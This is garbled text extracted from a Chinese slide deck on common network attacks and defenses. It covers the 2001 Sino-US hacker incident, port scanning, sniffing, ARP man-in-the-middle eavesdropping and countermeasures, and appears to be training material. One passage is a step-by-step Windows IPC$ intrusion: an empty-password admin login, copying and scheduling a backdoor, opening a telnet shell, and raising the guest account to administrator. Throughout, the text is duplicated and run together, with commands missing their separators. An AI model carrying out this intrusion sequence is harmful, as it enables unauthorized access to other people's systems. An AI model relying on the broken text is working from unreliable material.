绿盟常见网络攻击与防范.ppt

1、常见网络攻击与防范常见网络攻击与防范提纲提纲l常见的网络攻击方法l常用的安全防范措施常见的网络攻击方法常见的网络攻击方法19801985199019952000密码猜测密码猜测可自动复制的代码可自动复制的代码密码破解密码破解利用已知的漏洞利用已知的漏洞破坏审计系统破坏审计系统后门后门会话劫持会话劫持擦除痕迹擦除痕迹嗅探嗅探包欺骗包欺骗GUI远程控制远程控制自动探测扫描自动探测扫描拒绝服务拒绝服务www 攻击攻击工具工具攻击者攻击者入侵者水平入侵者水平攻击手法攻击手法半开放隐蔽扫描半开放隐蔽扫描控制台入侵控制台入侵检测网络管理检测网络管理DDOS 攻击攻击2002高高入侵技术的发展入侵技术的发展

2、采用采用漏洞漏洞扫描扫描工具工具选择选择会用会用的的方式方式入侵入侵获取获取系统系统一定一定权限权限提提升升为为最最高高权权限限安装安装系统系统后门后门获取敏感信息获取敏感信息或者或者其他攻击目的其他攻击目的入侵系统的常用步骤入侵系统的常用步骤端口端口判断判断判断判断系统系统选择选择最简最简方式方式入侵入侵分析分析可能可能有漏有漏洞的洞的服务服务获取获取系统系统一定一定权限权限提提升升为为最最高高权权限限安装安装多个多个系统系统后门后门清除清除入侵入侵脚印脚印攻击其攻击其他系统他系统获取敏获取敏感信息感信息作为其作为其他用途他用途较高明的入侵步骤较高明的入侵步骤2001年中美黑客大战年中美黑客

3、大战l事件背景和经过4.1撞机事件为导火线4月初，以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300个左右的站点页面被修改4月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了“五一卫国网战”战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。各方都得到第三方支援各大媒体纷纷报道，评论，中旬结束大战PoizonB0 x、pr0phet更改的网页更改的网页中经网数据有限公司中经网数据有限公司中国科学院心理研究所中国科学院心理研究所国内某政府网站国内某政府网站国内某大型商业网站国内某大型商业网站国内黑客组织更改

4、的网站页面国内黑客组织更改的网站页面美国劳工部网站美国劳工部网站美国某节点网站美国某节点网站美国某大型商业网站美国某大型商业网站美国某政府网站美国某政府网站这次事件中采用的常用攻击手法这次事件中采用的常用攻击手法l红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下：“我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系统，这个行动在技术上是没有任何炫耀和炒作的价值的。”l主要采用当时流行的系统漏洞进行攻击这次事件中被利用的典型漏洞这次事件中被利用的典型漏洞l用户名泄漏，缺省安装的系统用户名和密码lUnicode编码可穿越

5、firewall,执行黑客指令lASP源代码泄露可远程连接的数据库用户名和密码lSQLserver缺省安装l微软Windows2000登录验证机制可被绕过lBind远程溢出，Lion蠕虫lSUNrpc.sadmind远程溢出，sadmin/IIS蠕虫lWu-Ftpd格式字符串错误远程安全漏洞l拒绝服务(syn-flood,ping)这次事件中被利用的典型漏洞这次事件中被利用的典型漏洞l用户名泄漏，缺省安装的系统用户名和密码入侵者利用黑客工具扫描系统用户获得用户名和简单密码这次事件中被利用的典型漏洞这次事件中被利用的典型漏洞lWindows2000登录验证机制可被绕过常见的安全攻击方法常见的安全

6、攻击方法l直接获取口令进入系统：网络监听，暴力破解l利用系统自身安全漏洞l特洛伊木马程序：伪装成工具程序或者游戏等诱使用户打开或下载，然后使用户在无意中激活，导致系统后门被安装lWWW欺骗：诱使用户访问纂改过的网页l电子邮件攻击：邮件炸弹、邮件欺骗l网络监听：获取明文传输的敏感信息l通过一个节点来攻击其他节点：攻击者控制一台主机后，经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据l拒绝服务攻击和分布式拒绝服务攻击(D.o.S和D.D.o.S)IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。获取信息获取信息1.1.1.1.收集主机信息收集主机信息收

7、集主机信息收集主机信息Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令，结合Whois和Finger命令获取主机、操作系统和用户等信息 应用的方法：应用的方法：获取网络服务的端口作为入侵通道。2.2.端口扫瞄端口扫瞄1.TCP Connect()2.TCP SYN3.TCP FIN4.IP段扫瞄5.TCP反向Ident扫瞄6.FTP代理扫瞄7.UDP ICMP不到达扫瞄7种扫瞄类型：种扫瞄类型：1.NSS（网络安全扫描器

8、），可执行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。2.Strobe(超级优化TCP端口检测程序)，可记录指定机器上的所有开放端口，快速识别指定机器上运行的服务，提示可以被攻击的服务。3.SATAN(安全管理员的网络分析工具)，SATAN用于扫描远程主机，发现漏洞，包括FTPD漏洞和可写的FTP目录，NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。4.Jakal扫描器，可启动而不完成TCP连接，因此可以扫描一个区域而不留下痕迹。5.IdengTCPscan扫描器，可识别指定TCP端口的进程的UID。扫瞄软件举例：扫瞄软

9、件举例：3.Sniffer3.Sniffer3.Sniffer3.Sniffer扫瞄扫瞄扫瞄扫瞄原理：原理：sniffer类的软件能把本地网卡设置成工作在类的软件能把本地网卡设置成工作在“混杂混杂”（promiscuous）方式，使该网卡能接收所）方式，使该网卡能接收所有数据帧，从而获取别人的口令、金融帐号或其他有数据帧，从而获取别人的口令、金融帐号或其他敏感机密信息等。敏感机密信息等。方法与对策：方法与对策：1 1、用交换机替换用交换机替换HUB，交换机是两两接通，比普，交换机是两两接通，比普通通HUB安全。安全。2 2、使用检测的软件，如、使用检测的软件，如CPM Antisniff等，检

10、测网等，检测网络中是否有网卡工作在混杂状态（基本原理是发送络中是否有网卡工作在混杂状态（基本原理是发送本网中并不存在的本网中并不存在的MAC地址，看看是否有回应，如地址，看看是否有回应，如有回应，则说明有计算机网卡工作在混杂模式。）。有回应，则说明有计算机网卡工作在混杂模式。）。一次利用一次利用ipc$ipc$的入侵过程的入侵过程l1.C:netusex.x.x.xIPC$“”/user:“admintitrators”用流光扫到的用户名是administrators，密码为“空”的IP地址l2.C:copysrv.exex.x.x.xadmin$先复制srv.exe上去，在流光的Tools目

11、录下l3.C:nettimex.x.x.x查查时间，发现x.x.x.x的当前时间是2003/3/19上午11:00，命令成功完成。4.C:atx.x.x.x11:05srv.exe用at命令启动srv.exe吧（这里设置的时间要比主机时间推后）5.C:nettimex.x.x.x再查查时间到了没有，如果x.x.x.x的当前时间是2003/3/19上午11:05，那就准备开始下面的命令。6.C:telnetx.x.x.x99这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上

12、去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了一次利用一次利用ipc$ipc$的入侵过程的入侵过程l7.C:copyntlm.exe127.0.0.1admin$ntlm.exe也在流光的Tools目录中8.C:WINNTsystem32ntlm输入ntlm启动（这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“netstarttelnet”来开启Telnet服务)9.Telnetx.x.x.x，接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组

13、10.C:netuserguest/active:yes11.C:netuserguest1234将Guest的密码改为123412.C:netlocalgroupadministratorsguest/add将Guest变为Administrator网络监听及防范技术网络监听及防范技术l网络窃听是指通过截获他人网络上通信的数据流，并非法从中提取重要信息的一种方法l间接性利用现有网络协议的一些漏洞来实现，不直接对受害主机系统的整体性进行任何操作或破坏l隐蔽性网络窃听只对受害主机发出的数据流进行操作，不与主机交换信息，也不影响受害主机的正常通信网络监听及防范技术网络监听及防范技术共享式局域网下共

14、享式局域网下l共享式局域网采用的是广播信道，每一台主机所发出的帧都会被全网内所有主机接收到l一般网卡具有以下四种工作模式：广播模式、多播模式、直接模式和混杂模式l网卡的缺省工作模式是广播模式和直接模式，即只接收发给自己的和广播的帧网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下l使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地址，则提交给上层处理程序，否则丢弃此数据l当网卡工作于混杂模式的时候，它不做任何判断，直接将接收到的所有帧提交给上层处理程序l共享式网络下窃听就使用网卡的混杂模式 网络监听及防范技术网络监听及防范技术共享式局域网下共享式局域网下网络监

15、听及防范技术网络监听及防范技术交换式局域网下交换式局域网下l在数据链路层，数据帧的目的地址是以网卡的MAC地址来标识lARP协议实现的配对寻址 lARP请求包是以广播的形式发出，正常情况下只有正确IP地址与的主机才会发出ARP响应包，告知查询主机自己的MAC地址。l局域网中每台主机都维护着一张ARP表，其中存放着地址对。网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下ARP改向的中间人窃听A A发往发往B B：(MACb(MACb，MACaMACa，PROTOCOLPROTOCOL，DATA)DATA)B B发往发往A A：(MACa(MACa，MACbMACb，PROTOCO

16、LPROTOCOL，DATA)DATA)A A发往发往B B：(MACx(MACx，MACaMACa，PROTOCOLPROTOCOL，DATA)DATA)B B发往发往A A：(MACx(MACx，MACbMACb，PROTOCOLPROTOCOL，DATA)DATA)网络监听及防范技术网络监听及防范技术交换式局域网下交换式局域网下lX分别向A和B发送ARP包，促使其修改ARP表l主机A的ARP表中B为l主机B的ARP表中A为lX成为主机A和主机B之间的“中间人”网络监听及防范技术网络监听及防范技术网络窃听的被动防范网络窃听的被动防范 l分割网段细化网络会使得局域网中被窃听的可能性减小 l使用静态ARP表手工输入地址对 l采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖，而采用基于IP地址的交换l加密SSH、SSL、IPSec网络监听及防范技术网络监听及防范技术网络窃听的主动防范网络窃听的主动防范共享式局域网下的主动防范措施l伪造数据包构造一个含有正确目标IP地址和一个不存在目标MAC地址各个操作系统处理方式不同，一个比较好的MAC地址是FF-FF-FF-FF-FF-FEl